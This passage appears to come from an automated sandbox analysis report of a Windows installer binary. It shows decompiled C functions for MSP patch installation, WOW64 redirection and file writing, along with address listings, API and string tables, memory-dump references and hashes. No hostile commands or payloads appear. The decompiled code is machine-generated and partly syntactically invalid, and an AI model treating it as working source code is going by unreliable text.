							_v1616 = _t178;
							if(_t178 >=  *((intOrPtr*)(_t189 + 0x2c))) {
								_t172 = _v1632;
								goto L16;
							}
							_t190 = 0;
							continue;
						}
						_t192 = E00433C35(_t178,  &_v1592, ";", _t190);
						if(_t192 < 0) {
							_push("Failed to semi-colon delimit patches.");
							goto L12;
						}
						goto L8;
					}
					L5:
					_t175 =  *(_t174 + 0x90);
					goto L6;
				}
			}







































                                                                                                                                                                  0x0041d0c5
                                                                                                                                                                  0x0041d0cc
                                                                                                                                                                  0x0041d0d2
                                                                                                                                                                  0x0041d0dc
                                                                                                                                                                  0x0041d0df
                                                                                                                                                                  0x0041d0ea
                                                                                                                                                                  0x0041d0ed
                                                                                                                                                                  0x0041d0f6
                                                                                                                                                                  0x0041d102
                                                                                                                                                                  0x0041d10a
                                                                                                                                                                  0x0041d11a
                                                                                                                                                                  0x0041d11d
                                                                                                                                                                  0x0041d11e
                                                                                                                                                                  0x0041d11f
                                                                                                                                                                  0x0041d125
                                                                                                                                                                  0x0041d12b
                                                                                                                                                                  0x0041d133
                                                                                                                                                                  0x0041d139
                                                                                                                                                                  0x0041d13f
                                                                                                                                                                  0x0041d145
                                                                                                                                                                  0x0041d14b
                                                                                                                                                                  0x0041d151
                                                                                                                                                                  0x0041d157
                                                                                                                                                                  0x0041d159
                                                                                                                                                                  0x0041d162
                                                                                                                                                                  0x0041d242
                                                                                                                                                                  0x0041d264
                                                                                                                                                                  0x0041d26b
                                                                                                                                                                  0x0041d26d
                                                                                                                                                                  0x0041d27d
                                                                                                                                                                  0x0041d280
                                                                                                                                                                  0x0041d282
                                                                                                                                                                  0x0041d284
                                                                                                                                                                  0x0041d2bc
                                                                                                                                                                  0x0041d2dc
                                                                                                                                                                  0x0041d2de
                                                                                                                                                                  0x0041d2e0
                                                                                                                                                                  0x0041d2f1
                                                                                                                                                                  0x0041d30d
                                                                                                                                                                  0x0041d30f
                                                                                                                                                                  0x0041d311
                                                                                                                                                                  0x0041d31d
                                                                                                                                                                  0x0041d320
                                                                                                                                                                  0x0041d326
                                                                                                                                                                  0x0041d334
                                                                                                                                                                  0x0041d341
                                                                                                                                                                  0x0041d34c
                                                                                                                                                                  0x0041d34c
                                                                                                                                                                  0x0041d34d
                                                                                                                                                                  0x0041d3f1
                                                                                                                                                                  0x0041d400
                                                                                                                                                                  0x0041d407
                                                                                                                                                                  0x0041d409
                                                                                                                                                                  0x0041d412
                                                                                                                                                                  0x0041d42e
                                                                                                                                                                  0x0041d433
                                                                                                                                                                  0x0041d435
                                                                                                                                                                  0x0041d459
                                                                                                                                                                  0x0041d45b
                                                                                                                                                                  0x0041d45d
                                                                                                                                                                  0x0041d46c
                                                                                                                                                                  0x0041d473
                                                                                                                                                                  0x0041d478
                                                                                                                                                                  0x0041d47f
                                                                                                                                                                  0x0041d487
                                                                                                                                                                  0x0041d487
                                                                                                                                                                  0x0041d48c
                                                                                                                                                                  0x0041d493
                                                                                                                                                                  0x0041d49b
                                                                                                                                                                  0x0041d49b
                                                                                                                                                                  0x0041d4a0
                                                                                                                                                                  0x0041d4a7
                                                                                                                                                                  0x0041d4af
                                                                                                                                                                  0x0041d4af
                                                                                                                                                                  0x0041d4b4
                                                                                                                                                                  0x0041d4bb
                                                                                                                                                                  0x0041d4c3
                                                                                                                                                                  0x0041d4c3
                                                                                                                                                                  0x0041d4c8
                                                                                                                                                                  0x0041d4cf
                                                                                                                                                                  0x0041d4d7
                                                                                                                                                                  0x0041d4d7
                                                                                                                                                                  0x0041d4e2
                                                                                                                                                                  0x0041d4e2
                                                                                                                                                                  0x0041d4e4
                                                                                                                                                                  0x0041d50e
                                                                                                                                                                  0x0041d4e6
                                                                                                                                                                  0x0041d4e6
                                                                                                                                                                  0x0041d4e6
                                                                                                                                                                  0x0041d4e7
                                                                                                                                                                  0x0041d500
                                                                                                                                                                  0x0041d4e9
                                                                                                                                                                  0x0041d4e9
                                                                                                                                                                  0x0041d4ea
                                                                                                                                                                  0x0041d4f2
                                                                                                                                                                  0x0041d4f2
                                                                                                                                                                  0x0041d4ea
                                                                                                                                                                  0x0041d4e7
                                                                                                                                                                  0x0041d517
                                                                                                                                                                  0x0041d520
                                                                                                                                                                  0x0041d520
                                                                                                                                                                  0x0041d45f
                                                                                                                                                                  0x0041d464
                                                                                                                                                                  0x0041d464
                                                                                                                                                                  0x0041d465
                                                                                                                                                                  0x0041d46a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d46b
                                                                                                                                                                  0x0041d437
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d437
                                                                                                                                                                  0x0041d40b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d40b
                                                                                                                                                                  0x0041d353
                                                                                                                                                                  0x0041d353
                                                                                                                                                                  0x0041d354
                                                                                                                                                                  0x0041d35f
                                                                                                                                                                  0x0041d35f
                                                                                                                                                                  0x0041d373
                                                                                                                                                                  0x0041d375
                                                                                                                                                                  0x0041d377
                                                                                                                                                                  0x0041d396
                                                                                                                                                                  0x0041d398
                                                                                                                                                                  0x0041d39a
                                                                                                                                                                  0x0041d3b8
                                                                                                                                                                  0x0041d3ba
                                                                                                                                                                  0x0041d3bc
                                                                                                                                                                  0x0041d3e0
                                                                                                                                                                  0x0041d3e2
                                                                                                                                                                  0x0041d3e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d3ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d3ea
                                                                                                                                                                  0x0041d3be
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d3be
                                                                                                                                                                  0x0041d39c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d39c
                                                                                                                                                                  0x0041d379
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d379
                                                                                                                                                                  0x0041d356
                                                                                                                                                                  0x0041d359
                                                                                                                                                                  0x0041d2b3
                                                                                                                                                                  0x0041d2b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d2b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d359
                                                                                                                                                                  0x0041d313
                                                                                                                                                                  0x0041d216
                                                                                                                                                                  0x0041d216
                                                                                                                                                                  0x0041d217
                                                                                                                                                                  0x0041d21c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d21c
                                                                                                                                                                  0x0041d2e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d2e2
                                                                                                                                                                  0x0041d286
                                                                                                                                                                  0x0041d289
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d297
                                                                                                                                                                  0x0041d299
                                                                                                                                                                  0x0041d29b
                                                                                                                                                                  0x0041d2ba
                                                                                                                                                                  0x0041d2ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d2ba
                                                                                                                                                                  0x0041d29d
                                                                                                                                                                  0x0041d2ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d2b0
                                                                                                                                                                  0x0041d26f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d168
                                                                                                                                                                  0x0041d168
                                                                                                                                                                  0x0041d16f
                                                                                                                                                                  0x0041d173
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d187
                                                                                                                                                                  0x0041d18b
                                                                                                                                                                  0x0041d22b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d230
                                                                                                                                                                  0x0041d1ab
                                                                                                                                                                  0x0041d1af
                                                                                                                                                                  0x0041d211
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1b1
                                                                                                                                                                  0x0041d1b1
                                                                                                                                                                  0x0041d1b7
                                                                                                                                                                  0x0041d1c1
                                                                                                                                                                  0x0041d1c8
                                                                                                                                                                  0x0041d1e2
                                                                                                                                                                  0x0041d1f2
                                                                                                                                                                  0x0041d1f6
                                                                                                                                                                  0x0041d276
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d276
                                                                                                                                                                  0x0041d1fe
                                                                                                                                                                  0x0041d1ff
                                                                                                                                                                  0x0041d208
                                                                                                                                                                  0x0041d23c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d23c
                                                                                                                                                                  0x0041d20a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d20a
                                                                                                                                                                  0x0041d1dc
                                                                                                                                                                  0x0041d1e0
                                                                                                                                                                  0x0041d235
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d235
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1e0
                                                                                                                                                                  0x0041d1bb
                                                                                                                                                                  0x0041d1bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1bb

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 0041D3BE
                                                                                                                                                                  • Failed to add PATCH property on install., xrefs: 0041D379
                                                                                                                                                                  • Failed to build MSP path., xrefs: 0041D211
                                                                                                                                                                  • Failed to uninstall MSP package., xrefs: 0041D45F
                                                                                                                                                                  • Failed to add patches to PATCH property on install., xrefs: 0041D39C
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041D412
                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 0041D437
                                                                                                                                                                  • %ls %ls=ALL, xrefs: 0041D423
                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0041D40B
                                                                                                                                                                  • Failed to append patch., xrefs: 0041D276
                                                                                                                                                                  • Failed to get cached path for MSP package: %ls, xrefs: 0041D225
                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 0041D26F
                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 0041D3F4
                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0041D2A5
                                                                                                                                                                  • Failed to install MSP package., xrefs: 0041D3EA
                                                                                                                                                                  • PATCH=", xrefs: 0041D362
                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 0041D2E2
                                                                                                                                                                  • Failed to add properties to obfuscated argument string., xrefs: 0041D313
                                                                                                                                                                  • " REBOOT=ReallySuppress, xrefs: 0041D3A7
                                                                                                                                                                  • Failed to semi-colon delimit patches., xrefs: 0041D235
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: PATCH="$ REBOOT=ReallySuppress$" REBOOT=ReallySuppress$%ls %ls=ALL$Failed to add PATCH property on install.$Failed to add patches to PATCH property on install.$Failed to add properties to argument string.$Failed to add properties to obfuscated argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add the list of dependencies to ignore to the properties.$Failed to append patch.$Failed to build MSP path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for MSP package: %ls$Failed to initialize external UI handler.$Failed to install MSP package.$Failed to semi-colon delimit patches.$Failed to uninstall MSP package.$IGNOREDEPENDENCIES
                                                                                                                                                                  • API String ID: 0-1976012679
                                                                                                                                                                  • Opcode ID: 2dbd7ed9c39749fa5b9e00109b55f60a012efecce686971b99b45ee54c88c6a5
                                                                                                                                                                  • Instruction ID: 3dd3f85d17c15cb80ada3bd1c7794be77065441475e0240c41d1ae729b1fb9ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 2dbd7ed9c39749fa5b9e00109b55f60a012efecce686971b99b45ee54c88c6a5
                                                                                                                                                                  • Instruction Fuzzy Hash: BFC181B1D00629AFDB219F54CC41BDAB7B6AF48314F0041E7F908A7251D73A9EA0DF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004358BF, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 151libraryloadercomCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                  			E004358BF(signed int _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _t38;
				signed int _t46;
				signed int _t53;
				signed int _t58;
				signed short _t61;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t79;
				struct HINSTANCE__* _t81;
				signed int _t82;

				_t64 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t81 = GetModuleHandleA("kernel32.dll");
				if(_t81 != 0) {
					_t38 = GetProcAddress(_t81, "IsWow64Process");
					__eflags = _t38;
					if(_t38 == 0) {
						_t79 = 0;
						L9:
						__imp__CoCreateInstance(0x457f2c, 0, 1, 0x43bcb0,  &_v8);
						_t82 = 0x457f2c;
						__eflags = 0x457f2c;
						if(0x457f2c < 0) {
							L23:
							__eflags = _t64;
							if(_t64 == 0) {
								L26:
								L27:
								_t66 = _v12;
								if(_t66 != 0) {
									 *((intOrPtr*)( *_t66 + 8))(_t66);
								}
								_t67 = _v8;
								if(_t67 != 0) {
									 *((intOrPtr*)( *_t67 + 8))(_t67);
								}
								return _t82;
							}
							_t46 =  *_t79(_v16);
							__eflags = _t46;
							if(_t46 != 0) {
								goto L26;
							}
							ExitProcess(1);
						}
						_t68 = 0;
						__eflags = 0;
						_t74 = 0x457f2c;
						while(1) {
							__eflags =  *((intOrPtr*)(_t74 + _t68 * 4)) -  *((intOrPtr*)(0x43bca0 + _t68 * 4));
							_t74 = 0x457f2c;
							if(__eflags != 0) {
								break;
							}
							_t68 = _t68 + 1;
							__eflags = _t68 - 4;
							if(_t68 != 4) {
								continue;
							}
							L17:
							 *0x457f48 = 1;
							L18:
							__eflags = _a4;
							if(_a4 == 0) {
								L21:
								_v8 = _v8 & 0x00000000;
								 *_a8 = _v8;
								_t71 = _a12;
								__eflags = _t71;
								if(_t71 != 0) {
									_t29 =  &_v12;
									 *_t29 = _v12 & 0x00000000;
									__eflags =  *_t29;
									 *_t71 = _v12;
								}
								goto L23;
							}
							_t82 = E00435A58( &_v12, _v8, _a4,  &_v12);
							__eflags = _t82;
							if(_t82 < 0) {
								goto L23;
							}
							_t53 = _v8;
							_t82 =  *((intOrPtr*)( *_t53 + 0x54))(_t53, _v12, 0);
							__eflags = _t82;
							if(_t82 < 0) {
								goto L23;
							}
							goto L21;
						}
						_t69 = 0;
						__eflags = 0;
						while(1) {
							__eflags =  *((intOrPtr*)(_t74 + _t69 * 4)) -  *((intOrPtr*)(0x43bc90 + _t69 * 4));
							_t74 = 0x457f2c;
							if(__eflags != 0) {
								goto L18;
							}
							_t69 = _t69 + 1;
							__eflags = _t69 - 4;
							if(_t69 != 4) {
								continue;
							}
							goto L17;
						}
						goto L18;
					}
					_v20 = GetProcAddress(_t81, "Wow64DisableWow64FsRedirection");
					_t65 = GetProcAddress(_t81, "Wow64EnableWow64FsRedirection");
					_t79 = GetProcAddress(_t81, "Wow64RevertWow64FsRedirection");
					_t58 = _v20;
					__eflags = _t58;
					if(_t58 == 0) {
						L7:
						_t64 = 0;
						goto L9;
					}
					__eflags = _t65;
					if(_t65 == 0) {
						goto L7;
					}
					__eflags = _t79;
					if(_t79 == 0) {
						goto L7;
					}
					 *_t58( &_v16);
					_t64 =  *_t65(1);
					goto L9;
				}
				_t61 = GetLastError();
				_t85 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
				_t82 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
				E004300D9(0x80004005, "xmlutil.cpp", 0x90, _t82);
				goto L27;
			}























                                                                                                                                                                  0x004358ce
                                                                                                                                                                  0x004358d0
                                                                                                                                                                  0x004358d3
                                                                                                                                                                  0x004358d6
                                                                                                                                                                  0x004358df
                                                                                                                                                                  0x004358e3
                                                                                                                                                                  0x00435925
                                                                                                                                                                  0x00435927
                                                                                                                                                                  0x00435929
                                                                                                                                                                  0x0043596b
                                                                                                                                                                  0x0043596d
                                                                                                                                                                  0x00435980
                                                                                                                                                                  0x00435986
                                                                                                                                                                  0x00435988
                                                                                                                                                                  0x0043598a
                                                                                                                                                                  0x00435a20
                                                                                                                                                                  0x00435a20
                                                                                                                                                                  0x00435a22
                                                                                                                                                                  0x00435a35
                                                                                                                                                                  0x00435a36
                                                                                                                                                                  0x00435a36
                                                                                                                                                                  0x00435a3b
                                                                                                                                                                  0x00435a40
                                                                                                                                                                  0x00435a40
                                                                                                                                                                  0x00435a43
                                                                                                                                                                  0x00435a48
                                                                                                                                                                  0x00435a4d
                                                                                                                                                                  0x00435a4d
                                                                                                                                                                  0x00435a55
                                                                                                                                                                  0x00435a55
                                                                                                                                                                  0x00435a27
                                                                                                                                                                  0x00435a29
                                                                                                                                                                  0x00435a2b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435a2f
                                                                                                                                                                  0x00435a2f
                                                                                                                                                                  0x00435990
                                                                                                                                                                  0x00435990
                                                                                                                                                                  0x00435992
                                                                                                                                                                  0x00435997
                                                                                                                                                                  0x0043599f
                                                                                                                                                                  0x004359a2
                                                                                                                                                                  0x004359a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359a9
                                                                                                                                                                  0x004359aa
                                                                                                                                                                  0x004359ad
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359cb
                                                                                                                                                                  0x004359cb
                                                                                                                                                                  0x004359d5
                                                                                                                                                                  0x004359d5
                                                                                                                                                                  0x004359d9
                                                                                                                                                                  0x00435a04
                                                                                                                                                                  0x00435a0a
                                                                                                                                                                  0x00435a0e
                                                                                                                                                                  0x00435a10
                                                                                                                                                                  0x00435a13
                                                                                                                                                                  0x00435a15
                                                                                                                                                                  0x00435a1a
                                                                                                                                                                  0x00435a1a
                                                                                                                                                                  0x00435a1a
                                                                                                                                                                  0x00435a1e
                                                                                                                                                                  0x00435a1e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435a15
                                                                                                                                                                  0x004359ea
                                                                                                                                                                  0x004359ec
                                                                                                                                                                  0x004359ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359f0
                                                                                                                                                                  0x004359fe
                                                                                                                                                                  0x00435a00
                                                                                                                                                                  0x00435a02
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435a02
                                                                                                                                                                  0x004359b1
                                                                                                                                                                  0x004359b1
                                                                                                                                                                  0x004359b3
                                                                                                                                                                  0x004359bb
                                                                                                                                                                  0x004359be
                                                                                                                                                                  0x004359c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359c5
                                                                                                                                                                  0x004359c6
                                                                                                                                                                  0x004359c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004359b3
                                                                                                                                                                  0x00435939
                                                                                                                                                                  0x00435944
                                                                                                                                                                  0x00435948
                                                                                                                                                                  0x0043594a
                                                                                                                                                                  0x0043594d
                                                                                                                                                                  0x0043594f
                                                                                                                                                                  0x00435967
                                                                                                                                                                  0x00435967
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435967
                                                                                                                                                                  0x00435951
                                                                                                                                                                  0x00435953
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435955
                                                                                                                                                                  0x00435957
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043595d
                                                                                                                                                                  0x00435963
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00435963
                                                                                                                                                                  0x004358e5
                                                                                                                                                                  0x004358f6
                                                                                                                                                                  0x00435900
                                                                                                                                                                  0x0043590e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00435E6E,00000000,?,00000000), ref: 004358D9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004226E2,00401F17,004021A7,004021A3,00000000,004021A3), ref: 004358E5
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00435925
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00435931
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0043593C
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00435946
                                                                                                                                                                  • CoCreateInstance.OLE32(00457F2C,00000000,00000001,0043BCB0,?,?,?,?,?,?,?,?,?,?,?,004226E2), ref: 00435980
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00435A2F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                  • API String ID: 2124981135-499589564
                                                                                                                                                                  • Opcode ID: b45bb7ba0534999d0f66213c314f43797008e726ef2e2352df3c9686c28e9454
                                                                                                                                                                  • Instruction ID: 6feffe86186bbfcdcaa8012ac83443b55710265ac9d8363a46fd69455e52bc3f
                                                                                                                                                                  • Opcode Fuzzy Hash: b45bb7ba0534999d0f66213c314f43797008e726ef2e2352df3c9686c28e9454
                                                                                                                                                                  • Instruction Fuzzy Hash: E941CF32A00715ABDB20EFA8D884B6FB7A4EF48761F21516AE901E7341D778DD049B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042D94A, Relevance: 21.5, APIs: 14, Instructions: 537COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E0042D94A(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				void* _v6848;
				signed int _v6852;
				short _v6856;
				signed int _v6860;
				signed int _v6864;
				signed int _v6868;
				char _v6872;
				long _v6876;
				long _v6880;
				char _v6881;
				long _v6888;
				intOrPtr _v6892;
				signed int _v6896;
				int _v6900;
				void* __edi;
				signed int _t252;
				signed int _t254;
				signed char _t256;
				signed int _t257;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				intOrPtr _t265;
				signed int _t267;
				signed int* _t269;
				signed int _t274;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t290;
				short _t293;
				signed int _t294;
				signed int _t300;
				intOrPtr _t304;
				void* _t305;
				signed int _t310;
				int _t311;
				short _t313;
				signed int _t315;
				void* _t316;
				signed int _t321;
				void* _t323;
				signed int _t324;
				long _t328;
				signed int _t332;
				signed int _t338;
				void* _t345;
				short _t349;
				void* _t350;
				signed char _t360;
				signed int _t362;
				signed int _t363;
				signed int* _t364;
				long _t365;
				char* _t366;
				long _t367;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				intOrPtr _t372;
				signed int _t377;
				short _t379;
				signed int _t380;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				char _t391;
				signed int _t392;
				signed int _t393;
				signed short* _t396;
				void* _t397;
				char _t398;
				short _t405;
				signed int _t406;
				signed int _t408;
				short _t409;
				intOrPtr _t414;
				intOrPtr* _t415;
				signed int _t416;
				signed int _t418;
				char _t419;
				signed int _t424;
				signed int _t425;
				signed short* _t426;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				void* _t431;

				_t421 = __esi;
				E0042F730(0x1af0);
				_t252 =  *0x4560d0; // 0xae480e18
				_v8 = _t252 ^ _t430;
				_t254 = _a4;
				_t369 = _a8;
				_t416 = 0;
				_v6852 = _t254;
				_v6848 = _t369;
				_v6856 = 0;
				_v6872 = 0;
				if(_a12 != 0) {
					__eflags = _t369;
					if(_t369 != 0) {
						_push(__esi);
						_t371 = _t254 >> 5;
						_t424 = (_t254 & 0x0000001f) << 6;
						_v6868 = _t371;
						_t372 =  *((intOrPtr*)(0x457610 + _t371 * 4));
						_v6896 = _t424;
						_t360 =  *((intOrPtr*)(_t424 + _t372 + 0x24)) +  *((intOrPtr*)(_t424 + _t372 + 0x24)) >> 1;
						__eflags = _t360 - 2;
						if(_t360 == 2) {
							L6:
							_t256 =  !_a12;
							__eflags = _t256 & 0x00000001;
							if((_t256 & 0x00000001) != 0) {
								_t254 = _v6852;
								L9:
								__eflags =  *(_t424 + _t372 + 4) & 0x00000020;
								if(__eflags != 0) {
									E0042E270(_t372, __eflags, _t254, 0, 0, 2);
									_t431 = _t431 + 0x10;
								}
								_t257 = E0042D814(_v6852);
								__eflags = _t257;
								if(_t257 == 0) {
									L50:
									_t259 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
									__eflags =  *(_t424 + _t259 + 4) & 0x00000080;
									if(( *(_t424 + _t259 + 4) & 0x00000080) == 0) {
										_t260 = WriteFile( *(_t424 + _t259), _v6848, _a12,  &_v6876, 0);
										__eflags = _t260;
										if(_t260 == 0) {
											goto L92;
										}
										_t416 = _v6876;
										_t425 = 0;
										goto L93;
									}
									_t405 = _v6848;
									_t425 = 0;
									_v6860 = 0;
									__eflags = _t360;
									if(_t360 != 0) {
										_t379 = _t405;
										__eflags = _t360 - 2;
										if(_t360 != 2) {
											_t363 = _a12;
											_v6880 = _t379;
											__eflags = _t363;
											if(_t363 == 0) {
												goto L99;
											}
											_v6892 = 0xa;
											do {
												_v6888 = _v6888 & 0x00000000;
												_t426 = _v6880;
												_t380 = _t379 - _t405;
												__eflags = _t380;
												_t406 = _v6888;
												_t269 =  &_v1724;
												do {
													__eflags = _t380 - _t363;
													if(_t380 >= _t363) {
														break;
													}
													_t418 =  *_t426 & 0x0000ffff;
													_t426 =  &(_t426[1]);
													_t380 = _t380 + 2;
													_v6880 = _t426;
													__eflags = _t418 - _v6892;
													if(_t418 == _v6892) {
														_t428 = 0xd;
														 *_t269 = _t428;
														_t426 = _v6880;
														_t269 =  &(_t269[0]);
														_t406 = _t406 + 2;
														__eflags = _t406;
													}
													 *_t269 = _t418;
													_t406 = _t406 + 2;
													_t269 =  &(_t269[0]);
													__eflags = _t406 - 0x6a8;
												} while (_t406 < 0x6a8);
												asm("cdq");
												_t274 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t269 -  &_v1724 - _t406 >> 1,  &_v5140, 0xd55, 0, 0);
												_t425 = _v6860;
												_t416 = _v6856;
												_v6864 = _t274;
												__eflags = _t274;
												if(_t274 == 0) {
													goto L92;
												}
												_t383 = 0;
												__eflags = 0;
												_v6852 = 0;
												while(1) {
													_t280 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &(( &_v5140)[_t383]), _t274 - _t383,  &_v6876, 0);
													__eflags = _t280;
													if(_t280 == 0) {
														break;
													}
													_t383 = _v6852 + _v6876;
													_t274 = _v6864;
													_v6852 = _t383;
													__eflags = _t274 - _t383;
													if(_t274 > _t383) {
														continue;
													}
													L87:
													__eflags = _t282 - _t385;
													if(_t282 > _t385) {
														goto L93;
													}
													goto L88;
												}
												_t281 = GetLastError();
												_t385 = _v6852;
												_t425 = _t281;
												_t282 = _v6864;
												_v6860 = _t425;
												goto L87;
												L88:
												_t379 = _v6880;
												_t405 = _v6848;
												_t416 = _t379 - _t405;
												_v6856 = _t416;
												__eflags = _t416 - _t363;
											} while (_t416 < _t363);
											goto L94;
										}
										_v6852 = _t379;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L99;
										}
